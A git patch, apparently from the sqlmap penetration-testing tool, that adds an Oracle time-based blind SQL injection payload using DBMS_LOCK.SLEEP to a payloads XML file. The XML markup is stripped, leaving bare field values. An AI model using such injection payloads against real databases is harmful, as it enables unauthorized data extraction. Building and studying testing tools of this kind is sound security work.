From f31c02823258dea959c1ecb38b29c9ab236cd963 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Jan 2011 10:07:56 +0000 Subject: [PATCH] Oracle stacked vector based on DBMS_LOCK.SLEEP (https://foro.undersecurity.net/read.php?46,1436) --- xml/payloads.xml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index aa0c50b49..c45ec1374 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1454,6 +1454,26 @@ Formats: + + Oracle stacked queries (DBMS_LOCK.SLEEP) + 4 + 5 + 0 + 0 + 1 + ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + + ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END; + -- + + + + +
+ Oracle +
+
+ SQLite > 2.0 stacked queries (heavy query) 4